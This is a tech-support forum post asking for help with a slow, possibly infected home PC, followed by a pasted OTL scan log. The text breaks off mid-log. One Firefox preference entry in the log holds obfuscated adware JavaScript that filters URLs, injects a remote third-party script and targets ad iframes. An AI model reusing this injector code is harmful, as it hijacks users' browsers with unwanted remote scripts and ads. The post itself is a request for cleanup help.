Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Slow system, possible malware? [Solved]

Started by DrkMachine , Feb 11 2015 11:19 AM

  • This topic is locked This topic is locked

#1
DrkMachine
Posted 11 February 2015 - 11:19 AM

DrkMachine

    Member

  • Member
  • PipPipPip
  • 126 posts

Mothers computer has become rediculously slow, and several "coupon" programs were installed. I uninstalled  the coupon programs and several other programs of unknown origin. But performance has not improved. Just wondering if there may not be something hiding in there.

 

OTL

 

OTL logfile created on: 2/11/2015 8:15:14 AM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Becky's\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
894.49 Mb Total Physical Memory | 173.50 Mb Available Physical Memory | 19.40% Memory free
2.78 Gb Paging File | 1.26 Gb Available in Paging File | 45.46% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 286.05 Gb Total Space | 213.57 Gb Free Space | 74.66% Space Free | Partition Type: NTFS
Drive D: | 11.94 Gb Total Space | 2.23 Gb Free Space | 18.66% Space Free | Partition Type: NTFS
 
Computer Name: BETTYSDESKTOP-P | User Name: Becky's | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2015/02/11 08:10:43 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Becky's\Desktop\OTL.exe
PRC - [2014/11/07 00:00:05 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014/08/13 02:06:26 | 005,386,320 | ---- | M] (iolo technologies, LLC) -- C:\Program Files (x86)\iolo\System Mechanic Professional\LiveBoost.exe
PRC - [2014/08/13 02:06:22 | 006,039,840 | ---- | M] (iolo technologies, LLC) -- C:\Program Files (x86)\iolo\System Mechanic Professional\System Shield\ioloSSTray.exe
PRC - [2014/08/12 23:39:54 | 004,700,872 | ---- | M] (iolo technologies, LLC) -- C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe
PRC - [2013/12/21 00:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2009/09/16 17:01:16 | 000,020,480 | ---- | M] (Intuit) -- C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
PRC - [2009/08/05 14:45:22 | 000,206,120 | ---- | M] (CyberLink) -- c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
PRC - [2009/07/23 21:45:52 | 000,128,296 | ---- | M] (CyberLink Corp.) -- c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/11/06 23:59:59 | 003,649,648 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2009/08/05 14:45:22 | 000,931,112 | ---- | M] () -- c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/11/21 20:35:29 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/03/25 15:56:30 | 000,181,512 | ---- | M] (CYREN Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Commtouch\AntiVirus5\vseqrts.exe -- (vseqrts)
SRV:64bit: - [2014/03/25 15:56:28 | 000,119,560 | R--- | M] (CYREN Inc.) [Auto | Running] -- C:\Program Files\Common Files\Commtouch\AntiVirus5\vsedsps.exe -- (vsedsps)
SRV:64bit: - [2014/03/25 15:56:22 | 000,122,120 | R--- | M] (CYREN Inc.) [Auto | Running] -- C:\Program Files\Common Files\Commtouch\AntiVirus5\vseamps.exe -- (vseamps)
SRV:64bit: - [2013/05/26 23:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2009/12/03 19:27:24 | 000,028,672 | ---- | M] (LSI Corporation) [Disabled | Stopped] -- C:\Program Files\LSI SoftModem\agr64svc.exe -- (AgereModemAudio)
SRV - [2015/02/10 16:50:37 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/11/07 00:00:01 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/08/12 23:39:54 | 004,700,872 | ---- | M] (iolo technologies, LLC) [Auto | Running] -- C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe -- (ioloSystemService)
SRV - [2014/08/12 23:39:54 | 004,700,872 | ---- | M] (iolo technologies, LLC) [Auto | Stopped] -- C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe -- (ioloFileInfoList)
SRV - [2014/03/20 16:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/12/21 00:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/11/04 18:31:56 | 000,092,160 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe -- (HP Support Assistant Service)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2010/09/07 10:47:18 | 000,202,048 | ---- | M] () [Disabled | Stopped] -- C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe -- (MotoHelper)
SRV - [2009/09/16 17:01:16 | 000,020,480 | ---- | M] (Intuit) [Auto | Running] -- C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe -- (QBCFMonitorService)
SRV - [2009/05/22 12:02:20 | 000,250,616 | ---- | M] (WildTangent, Inc.) [Disabled | Stopped] -- C:\Program Files (x86)\HP Games\HP Game Console\GameConsoleService.exe -- (GameConsoleService)
SRV - [2006/11/09 14:30:14 | 000,065,536 | ---- | M] (Intuit Inc.) [Disabled | Stopped] -- C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe -- (QBFCService)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/08/12 23:38:24 | 000,032,912 | ---- | M] (EldoS Corporation) [Kernel | System | Stop_Pending] -- C:\Windows\SysNative\drivers\rawdsk3.sys -- (RawDisk3)
DRV:64bit: - [2014/03/25 15:59:48 | 000,174,856 | R--- | M] (CYREN Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\amp.sys -- (AMP)
DRV:64bit: - [2014/03/25 15:59:46 | 001,728,776 | R--- | M] (CYREN Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\ampse.sys -- (AMPSE)
DRV:64bit: - [2013/10/01 20:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2012/08/23 08:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2012/08/02 10:21:22 | 000,082,160 | ---- | M] (Raxco Software, Inc.) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\PDFsFilter.sys -- (PDFsFilter)
DRV:64bit: - [2012/04/17 07:25:02 | 000,031,432 | ---- | M] (EldoS Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ElRawDsk.sys -- (ElRawDisk)
DRV:64bit: - [2012/03/01 00:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/08/01 15:59:06 | 000,045,416 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\point64.sys -- (Point64)
DRV:64bit: - [2011/05/18 08:08:32 | 000,047,616 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dc3d.sys -- (dc3d)
DRV:64bit: - [2011/03/11 00:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 00:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/11/20 07:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/01/26 16:52:22 | 001,212,416 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\agrsm64.sys -- (AgereSoftModem)
DRV:64bit: - [2009/07/30 23:12:56 | 000,339,744 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvmf6264.sys -- (NVNET)
DRV:64bit: - [2009/07/13 19:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 19:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 19:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/10 14:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 14:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 14:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 14:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2008/08/20 03:31:40 | 000,514,048 | ---- | M] (Marvell Semiconductor, Inc) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\MRVW148.sys -- (MRVW148)
DRV - [2010/06/29 17:30:08 | 000,009,341 | ---- | M] (iolo technologies, LLC (based on original work by Bo Brantén)) [Kernel | System | Stopped] -- C:\Windows\SysWow64\drivers\filedisk.sys -- (FileDisk)
DRV - [2009/07/13 19:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE:64bit: - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE:64bit: - HKLM\..\SearchScopes\{A185A52C-3808-4AE5-B562-CEB424688156}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE:64bit: - HKLM\..\SearchScopes\{A18DC704-6BAD-4A58-8E45-842A87CB5324}: "URL" = http://www.ask.com/w...}&l=dis&o=ushpd
IE - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKLM\..\SearchScopes\{A185A52C-3808-4AE5-B562-CEB424688156}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\..\SearchScopes\{A18DC704-6BAD-4A58-8E45-842A87CB5324}: "URL" = http://www.ask.com/w...}&l=dis&o=ushpd
 
 
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
 
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.h...avilion&pf=cndt
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}: "URL" = http://www.trovi.com...rchTerms}&SSPV=
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\SearchScopes\{A185A52C-3808-4AE5-B562-CEB424688156}: "URL" = http://www.bing.com/...E11SR&pc=HPDTDF
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\SearchScopes\{A18DC704-6BAD-4A58-8E45-842A87CB5324}: "URL" = http://www.ask.com/w...}&l=dis&o=ushpd
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\SearchScopes\{E4E78C57-1EE9-42EE-9D2F-C88110E7E838}: "URL" = http://search.yahoo....p={searchTerms}
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\..\SearchScopes\FEA307F66F7B4ED9B86659AAECDF29FB: "URL" = https://www.google.c...q={searchTerms}
IE - HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.order.3: "Bing "
FF - prefs.js..browser.search.param.yahoo-fr: "chr-greentree_ff&ilc=12&type=293224"
FF - prefs.js..browser.startup.homepage: "http://search.yahoo....=spigot-yhp-ff"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:33.0.3
FF - prefs.js..extensions.tJm2MTcJYn5WRdHV.scode: "try{(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"rjnHqTk9pjwGqjs4rHs9rHUGpdC\")>-1||url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"3juices.s\")>-1||url.indexOf(\"ce4everything.co\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaviral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=ct3330145\")>-1||url.indexOf(\"?ctid=ct3330146\")>-1||url.indexOf(\"?ctid=ct3330147\")>-1||url.indexOf(\"?ctid=ct3330148\")>-1||url.indexOf(\"?ctid=ct3330149\")>-1||url.indexOf(\"http://sporty-glow.com/\")>-1||url.indexOf(\"http://game-trek.net/\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1||url.indexOf(\"namyneck.com\")>-1||url.indexOf(\"styloosh.com\")>-1||url.indexOf(\"applicationgrabb.net\")>-1||url.indexOf(\"databass.info\")>-1||url.indexOf(\"firstfirst.net\")>-1||url.indexOf(\"liversely.com\")>-1||url.indexOf(\"liversely.net\")>-1||url.indexOf(\"livesetwebs.org\")>-1||url.indexOf(\"lp.ncdownloader.com\")>-1||url.indexOf(\"lp.vaudix.com\")>-1||url.indexOf(\"masteroids.com\")>-1||url.indexOf(\"reditions.net\")>-1||url.indexOf(\"sharesuper.info\")>-1||url.indexOf(\"storaget.info\")>-1||url.indexOf(\"westzip.in\")>-1||url.indexOf(\"boxhilade.com\")>-1||url.indexOf(\"mylinksworld.com\")>-1||url.indexOf(\"shoppingwiz.co\")>-1||url.indexOf(\"rabbitsearch.net\")>-1||url.indexOf(\"searchandbake.com\")>-1||url.indexOf(\"baidu.co.th\")>-1||url.indexOf(\"ooyd.com\")>-1||url.indexOf(\"jobsro.com\")>-1||url.indexOf(\"kaoor.com\")>-1||url.indexOf(\"myloginbox.com\")>-1||url.indexOf(\"mainpagesite.com\")>-1||url.indexOf(\"turtleclip.com\")>-1||url.indexOf(\"blackyclip.com\")>-1||url.indexOf(\"film-tease.com\")>-1||url.indexOf(\"bestpaydayloans2015.com\")>-1||url.indexOf(\"hotelsdealsreviews.com\")>-1||url.indexOf(\"top10cellphoneplans.com\")>-1||url.indexOf(\"top5autoinsurance.com\")>-1||url.indexOf(\"topcreditreportsites.com\")>-1||url.indexOf(\"smartshopping.com\")>-1||url.indexOf(\"www.search.smartshopping.com\")>-1||url.indexOf(\"www.local.smartshopping.com\")>-1||url.indexOf(\"www.shoppstop.com\")>-1||url.indexOf(\"localmoxie.com\")>-1||url.indexOf(\"www.yellowmoxie.com\")>-1||url.indexOf(\"www.mail.com\")>-1||url.indexOf(\"suche.mail.com\")>-1||url.indexOf(\"www.web.de\")>-1||url.indexOf(\"suche.web.de\")>-1||url.indexOf(\"suche.gmx.de\")>-1||url.indexOf(\"search.gmx.com\")>-1||url.indexOf(\"search.gmx.co.uk\")>-1||url.indexOf(\"news.gmx.com\")>-1||url.indexOf(\"news.gmx.co.uk\")>-1||url.indexOf(\"www.turbosearchengine.com\")>-1||url.indexOf(\"search.turbosearchengine.com\")>-1||url.indexOf(\"www.relatedtopix.com\")>-1||url.indexOf(\"search.relatedtopix.com\")>-1||url.indexOf(\"www.app-rover.com\")>-1||url.indexOf(\"www.appigniter.com\")>-1||url.indexOf(\"www.bposolutions.com\")>-1||url.indexOf(\"www.zhuamob.com\")>-1||url.indexOf(\"www.yieldnexus.com\")>-1||url.indexOf(\"www.tfxiq.com\")>-1||url.indexOf(\"www.tfxiq.net\")>-1||url.indexOf(\"smartshopping.com\")>-1||url.indexOf(\"www.search.smartshopping.com\")>-1||url.indexOf(\"www.local.smartshopping.com\")>-1||url.indexOf(\"www.shoppstop.com\")>-1||url.indexOf(\"localmoxie.com\")>-1||url.indexOf(\"www.yellowmoxie.com\")>-1||url.indexOf(\"www.mail.com\")>-1||url.indexOf(\"suche.mail.com\")>-1||url.indexOf(\"www.web.de\")>-1||url.indexOf(\"suche.web.de\")>-1||url.indexOf(\"suche.gmx.de\")>-1||url.indexOf(\"search.gmx.com\")>-1||url.indexOf(\"search.gmx.co.uk\")>-1||url.indexOf(\"news.gmx.com\")>-1||url.indexOf(\"news.gmx.co.uk\")>-1||url.indexOf(\"www.turbosearchengine.com\")>-1||url.indexOf(\"search.turbosearchengine.com\")>-1||url.indexOf(\"www.relatedtopix.com\")>-1||url.indexOf(\"search.relatedtopix.com\")>-1||url.indexOf(\"www.app-rover.com\")>-1||url.indexOf(\"www.appigniter.com\")>-1||url.indexOf(\"www.bposolutions.com\")>-1||url.indexOf(\"www.zhuamob.com\")>-1||url.indexOf(\"www.yieldnexus.com\")>-1||url.indexOf(\"www.tfxiq.com\")>-1||url.indexOf(\"www.tfxiq.net\")>-1||url.indexOf(\"=CONMHP&conlogo=CT3210127\")>-1){return}}catch(e){};(function(){ if (!document.getElementById(\"djdnjh4e7dne543gv\") && window.top==window.self) { var _irhjpivr = function() { window._chch3e7xjxs2 = \"14365491252932439287\" }; if (-1 == navigator.userAgent.toLowerCase().indexOf(\"chrome\")) _irhjpivr(); else { var s1 = document.createElement(\"script\"); s1.innerHTML = \"(\" + _irhjpivr.toString() + \")()\"; document.getElementsByTagName(\"head\")[0].appendChild(s1) } var s = document.createElement(\"script\"); s.type = \"text/javascript\"; s.id = \"djdnjh4e7dne543gv\"; s.src = \"//static.donation-tools.org/widgets/WPPartner/widget.js?_irh_prodname=tperfectcoupon&_irh_subid=684_1\"; document.getElementsByTagName(\"head\")[0].appendChild(s) } }());;(function(){var stngs = {attr_name:'s14365491252932439287',szy_domain:[\"scoreserving.info\",\"theprivilegesbox.com\"],ad_sizes:[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]],checkif:function(ifr){return (ifr.getAttribute('s14365491252932439287') || ifr.src.indexOf('=13872950')>-1||ifr.src.indexOf('=13872950')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};if(\"undefined\"==typeof window.adzy653rk&&document.getElementsByTagName(\"body\").length&&!document.getElementsByTagName(\"body\")[0].getAttribute(\"jhjlijpomuhn_m\")){var removeNode=function(a){for(var b=(63,342)>(559,85)?(56,!0):(63,1401),c=(372,1)<(364,98)?(1098,!1):(971,40),d=829<(71,1335)?(1100,122):(918,478),e=12>(481,500)?267:586<(136,1243)?(339,90):(92,89),g=27<=(42,519)?(468,97):(69,283),h=137<(169,296)?(93,\"m\"):(96,984),f=136>=(37,599)?(92,301):(966,429)<=(369,537)?(213,64):(578,1008),l=307>=(1295,\n1355)?(809,\"L\"):69>=(158,391)?(669,117):141<(368,514)?(1490,6):(1113,116),n=(43,255)>=(223,250)?(468,63):(879,133),k=22>(199,868)?(1170,\"s\"):(917,799)>=(972,448)?(122,\"n\"):44>=(211,96)?(1080,71):(58,556),A=75>=(1239,49)?(21,\"9\"):27>=(501,441)?(59,48):(207,1058)<(454,90)?\";\":(122,914),K=414>=(295,137)?(109,\"8\"):(1165,557),v=874>=(78,39)?(77,\"7\"):116>(476,807)?(1499,989):(520,925),R=(953,33)>(639,132)?(434,\"z\"):149<(132,581)?(77,\"z\"):61>=(597,482)?126:(771,8),S=456<=(451,877)?(2,\"x\"):(52,18),F=326<\n(1197,1202)?(1274,\"i\"):(26,109),G=410>=(1290,732)?(485,25):52>(20,78)?1380:1102>=(49,51)?(294,\"b\"):(112,161),L=(146,387)>(818,87)?(534,\"Y\"):(1385,1004),T=52<(95,139)?(57,\"X\"):(840,124),U=123<=(105,50)?(142,\"'\"):1333>(11,318)?(108,\"T\"):(962,1482),M=(755,119)>=(49,128)?47:880<(473,103)?41:59>(183,40)?(272,\"Q\"):(125,73),V=533<(155,25)?1E3:55>(133,112)?(1416,429):(31,1188)>(72,497)?(502,\"N\"):(82,144),N=(491,93)>(39,1009)?(1047,\"aaa\"):325>=(249,9)?(83,\"M\"):(645,114),O=(91,94)>(16,53)?(484,\"K\"):(462,83)>=\n(3,103)?(114,90):146<(114,132)?\"O\":(145,53),P=259<(286,86)?209:142>=(303,8)?(189,\"D\"):88>=(24,287)?(40,191):(1406,186),W=102<=(476,402)?(132,4537426):(315,47),H=(97,23)<=(514,29)?(117,1290452675):(862,1417),B=117<(32,132)?(352,\"0\"):(78,430),r=110>(545,410)?(71,457):548>=(81,37)?(555,\"2\"):(96,999),w=82<(1007,1382)?(869,\"f\"):(86,207),D=131>=(471,71)?(208,\"s\"):(103,115),C=107>=(74,129)?(25,\"c\"):(20,532)<=(74,750)?(20,\"p\"):237>(31,498)?(446,133):(110,138),I=100<(31,83)?(54,129):(112,132)<=(75,408)?(49,\n\"U\"):(593,65),H=-H,E=s7S5.V7T,J=s7S5.j7T;-1139651341!==s7S5.E0.i0(J.toString(),J.toString().length,8698539);J++)y.push(u(j)),S9(),E+=s7S5.V7T;if(s7S5.E0.i0(E.toString(),E.toString().length,W)!==H)return j2<<Y2;var 